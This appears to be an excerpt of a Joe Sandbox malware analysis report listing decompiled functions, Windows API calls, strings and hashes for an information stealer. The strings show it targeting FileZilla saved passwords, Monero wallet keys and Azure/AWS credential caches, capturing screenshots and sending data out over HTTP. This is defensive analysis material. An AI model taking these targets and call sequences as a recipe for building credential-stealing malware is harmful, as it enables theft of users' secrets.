                  • lstrcat.KERNEL32(?,00B21698), ref: 00B10626
                  • lstrcat.KERNEL32(?,00B2169C), ref: 00B10635
                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B20DB2), ref: 00B1068E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                  • API String ID: 1942843190-555421843
                  • Opcode ID: f3899c4bc42127acab5e0ab35b1fed39fee87214226eed28cc2f5b76a3d0e99e
                  • Instruction ID: ca69a55c70bf8a08ede0da1acd319fbd58da25a4cd8a139f9a41b4eb4dfca949
                  • Opcode Fuzzy Hash: f3899c4bc42127acab5e0ab35b1fed39fee87214226eed28cc2f5b76a3d0e99e
                  • Instruction Fuzzy Hash: F9D15C75951208ABCB04FBF4DD96EEE73B8EF14310F804598F106B6191EE74BA86CB61
                  Function 00B05960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B1A7E6
                    • Part of subcall function 00B047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B04839
                    • Part of subcall function 00B047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B04849
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00B059F8
                  • StrCmpCA.SHLWAPI(?,011FE3D0), ref: 00B05A13
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B05B93
                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,011FE320,00000000,?,011F9F68,00000000,?,00B21A1C), ref: 00B05E71
                  • lstrlen.KERNEL32(00000000), ref: 00B05E82
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00B05E93
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B05E9A
                  • lstrlen.KERNEL32(00000000), ref: 00B05EAF
                  • lstrlen.KERNEL32(00000000), ref: 00B05ED8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00B05EF1
                  • lstrlen.KERNEL32(00000000,?,?), ref: 00B05F1B
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00B05F2F
                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00B05F4C
                  • InternetCloseHandle.WININET(00000000), ref: 00B05FB0
                  • InternetCloseHandle.WININET(00000000), ref: 00B05FBD
                  • HttpOpenRequestA.WININET(00000000,011FE310,?,011FDD60,00000000,00000000,00400100,00000000), ref: 00B05BF8
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                  • InternetCloseHandle.WININET(00000000), ref: 00B05FC7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 874700897-2180234286
                  • Opcode ID: 6f9cd2ffa73508d2e0fd66efb2c1ae2e967ebb904a06d9f9ca039437826f9041
                  • Instruction ID: 5bd4d50bb76c8e4643c6811ad5639f568e5e1cb9a9711e10f5f3834ca20883c4
                  • Opcode Fuzzy Hash: 6f9cd2ffa73508d2e0fd66efb2c1ae2e967ebb904a06d9f9ca039437826f9041
                  • Instruction Fuzzy Hash: 95120071861118ABDB15EBA4DC95FEEB3B8BF14710F9041D9B10AB2191DF703A8ACF61
                  Function 00B0CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                    • Part of subcall function 00B18B60: GetSystemTime.KERNEL32(00B20E1A,011FA058,00B205AE,?,?,00B013F9,?,0000001A,00B20E1A,00000000,?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B18B86
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B0CF83
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00B0D0C7
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B0D0CE
                  • lstrcat.KERNEL32(?,00000000), ref: 00B0D208
                  • lstrcat.KERNEL32(?,00B21478), ref: 00B0D217
                  • lstrcat.KERNEL32(?,00000000), ref: 00B0D22A
                  • lstrcat.KERNEL32(?,00B2147C), ref: 00B0D239
                  • lstrcat.KERNEL32(?,00000000), ref: 00B0D24C
                  • lstrcat.KERNEL32(?,00B21480), ref: 00B0D25B
                  • lstrcat.KERNEL32(?,00000000), ref: 00B0D26E
                  • lstrcat.KERNEL32(?,00B21484), ref: 00B0D27D
                  • lstrcat.KERNEL32(?,00000000), ref: 00B0D290
                  • lstrcat.KERNEL32(?,00B21488), ref: 00B0D29F
                  • lstrcat.KERNEL32(?,00000000), ref: 00B0D2B2
                  • lstrcat.KERNEL32(?,00B2148C), ref: 00B0D2C1
                  • lstrcat.KERNEL32(?,00000000), ref: 00B0D2D4
                  • lstrcat.KERNEL32(?,00B21490), ref: 00B0D2E3
                    • Part of subcall function 00B1A820: lstrlen.KERNEL32(00B04F05,?,?,00B04F05,00B20DDE), ref: 00B1A82B
                    • Part of subcall function 00B1A820: lstrcpy.KERNEL32(00B20DDE,00000000), ref: 00B1A885
                  • lstrlen.KERNEL32(?), ref: 00B0D32A
                  • lstrlen.KERNEL32(?), ref: 00B0D339
                    • Part of subcall function 00B1AA70: StrCmpCA.SHLWAPI(011F88D0,00B0A7A7,?,00B0A7A7,011F88D0), ref: 00B1AA8F
                  • DeleteFileA.KERNEL32(00000000), ref: 00B0D3B4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                  • String ID:
                  • API String ID: 1956182324-0
                  • Opcode ID: 569c277744bde8212cfcfc91163c1950458034812eb6fd63854ae20e7443e100
                  • Instruction ID: 7450e8a351d6e99a8cb50bfa0afd020904465e49d959b84cd462f7e881557b62
                  • Opcode Fuzzy Hash: 569c277744bde8212cfcfc91163c1950458034812eb6fd63854ae20e7443e100
                  • Instruction Fuzzy Hash: FAE14D75951208ABCB04EFA4DD96EEE73B8AF14300F504198F106B61A1DE35BE46CB72
                  Function 00B0C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,011FCD68,00000000,?,00B2144C,00000000,?,?), ref: 00B0CA6C
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00B0CA89
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00B0CA95
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B0CAA8
                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00B0CAD9
                  • StrStrA.SHLWAPI(?,011FCD38,00B20B52), ref: 00B0CAF7
                  • StrStrA.SHLWAPI(00000000,011FCB10), ref: 00B0CB1E
                  • StrStrA.SHLWAPI(?,011FD5B8,00000000,?,00B21458,00000000,?,00000000,00000000,?,011F8970,00000000,?,00B21454,00000000,?), ref: 00B0CCA2
                  • StrStrA.SHLWAPI(00000000,011FD618), ref: 00B0CCB9
                    • Part of subcall function 00B0C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00B0C871
                    • Part of subcall function 00B0C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00B0C87C
                  • StrStrA.SHLWAPI(?,011FD618,00000000,?,00B2145C,00000000,?,00000000,011F8980), ref: 00B0CD5A
                  • StrStrA.SHLWAPI(00000000,011F8B40), ref: 00B0CD71
                    • Part of subcall function 00B0C820: lstrcat.KERNEL32(?,00B20B46), ref: 00B0C943
                    • Part of subcall function 00B0C820: lstrcat.KERNEL32(?,00B20B47), ref: 00B0C957
                    • Part of subcall function 00B0C820: lstrcat.KERNEL32(?,00B20B4E), ref: 00B0C978
                  • lstrlen.KERNEL32(00000000), ref: 00B0CE44
                  • CloseHandle.KERNEL32(00000000), ref: 00B0CE9C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                  • String ID:
                  • API String ID: 3744635739-3916222277
                  • Opcode ID: 8b052b20a013552cedf915b613f93454a0043e4aa203aff90284049ce9cefedf
                  • Instruction ID: c0c0dba986daa7a12d9d38939b7f83f1df58dfc73be4ebd140a73c86b7c47b6d
                  • Opcode Fuzzy Hash: 8b052b20a013552cedf915b613f93454a0043e4aa203aff90284049ce9cefedf
                  • Instruction Fuzzy Hash: BFE1FD71911108ABDB14EFA4DD95FEEB7B8AF14310F804199F106B7191EF347A8ACB62
                  Function 00B18320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                  • RegOpenKeyExA.ADVAPI32(00000000,011FAEE0,00000000,00020019,00000000,00B205B6), ref: 00B183A4
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00B18426
                  • wsprintfA.USER32 ref: 00B18459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00B1847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 00B1848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00B18499
                    • Part of subcall function 00B1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B1A7E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                  • String ID: - $%s\%s$?
                  • API String ID: 3246050789-3278919252
                  • Opcode ID: 98c26fb521ea26169731362a9d260122213bc4fe056e4c804d3ee3a5e9eaec7a
                  • Instruction ID: 17690fe71687ca02d6275baa62d918bb4cb244e0817d0534bab51b11251bebd0
                  • Opcode Fuzzy Hash: 98c26fb521ea26169731362a9d260122213bc4fe056e4c804d3ee3a5e9eaec7a
                  • Instruction Fuzzy Hash: 64811871951218ABEB24DF54CD95FEAB7B8FB08710F4082D9E109A6180DF716BC6CFA1
                  Function 00B14D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B18E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00B14DB0
                  • lstrcat.KERNEL32(?,\.azure\), ref: 00B14DCD
                    • Part of subcall function 00B14910: wsprintfA.USER32 ref: 00B1492C
                    • Part of subcall function 00B14910: FindFirstFileA.KERNEL32(?,?), ref: 00B14943
                  • lstrcat.KERNEL32(?,00000000), ref: 00B14E3C
                  • lstrcat.KERNEL32(?,\.aws\), ref: 00B14E59
                    • Part of subcall function 00B14910: StrCmpCA.SHLWAPI(?,00B20FDC), ref: 00B14971
                    • Part of subcall function 00B14910: StrCmpCA.SHLWAPI(?,00B20FE0), ref: 00B14987
                    • Part of subcall function 00B14910: FindNextFileA.KERNEL32(000000FF,?), ref: 00B14B7D
                    • Part of subcall function 00B14910: FindClose.KERNEL32(000000FF), ref: 00B14B92
                  • lstrcat.KERNEL32(?,00000000), ref: 00B14EC8
                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00B14EE5
                    • Part of subcall function 00B14910: wsprintfA.USER32 ref: 00B149B0
                    • Part of subcall function 00B14910: StrCmpCA.SHLWAPI(?,00B208D2), ref: 00B149C5
                    • Part of subcall function 00B14910: wsprintfA.USER32 ref: 00B149E2
                    • Part of subcall function 00B14910: PathMatchSpecA.SHLWAPI(?,?), ref: 00B14A1E
                    • Part of subcall function 00B14910: lstrcat.KERNEL32(?,011FE280), ref: 00B14A4A
                    • Part of subcall function 00B14910: lstrcat.KERNEL32(?,00B20FF8), ref: 00B14A5C
                    • Part of subcall function 00B14910: lstrcat.KERNEL32(?,?), ref: 00B14A70
                    • Part of subcall function 00B14910: lstrcat.KERNEL32(?,00B20FFC), ref: 00B14A82
                    • Part of subcall function 00B14910: lstrcat.KERNEL32(?,?), ref: 00B14A96
                    • Part of subcall function 00B14910: CopyFileA.KERNEL32(?,?,00000001), ref: 00B14AAC
                    • Part of subcall function 00B14910: DeleteFileA.KERNEL32(?), ref: 00B14B31
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                  • API String ID: 949356159-974132213
                  • Opcode ID: de01544ddf7c3863f9a2481a090df386e9ceccc2f4e53ec0d9b20f24f97808b9
                  • Instruction ID: ddcc82a8d76fcd76676fde6d4cf87b06612e021ebc5821db6d235638f10da17c
                  • Opcode Fuzzy Hash: de01544ddf7c3863f9a2481a090df386e9ceccc2f4e53ec0d9b20f24f97808b9
                  • Instruction Fuzzy Hash: A44195BA94031467DB14F770EC47FEE37B8AB24700F4049D4B249A61C1EEB45BC98BA2
                  Function 00B19010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                  Download Yara Rule
                  APIs
                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00B1906C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateGlobalStream
                  • String ID: image/jpeg
                  • API String ID: 2244384528-3785015651
                  • Opcode ID: cf9dfe9fadd5b300fc636d9771ba3fbf7a397ac8291131618cb4efda57a135f0
                  • Instruction ID: c07713a9d34b503b5a2829f441b893c689999510ea096bba94c8f71d1cc73342
                  • Opcode Fuzzy Hash: cf9dfe9fadd5b300fc636d9771ba3fbf7a397ac8291131618cb4efda57a135f0
                  • Instruction Fuzzy Hash: 1A71FB75A50208ABDB14DFE8DC99FEEB7B8FB48300F508548F515EB290DB34A945CB61
                  Function 00B12E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00B131C5
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00B1335D
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00B134EA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
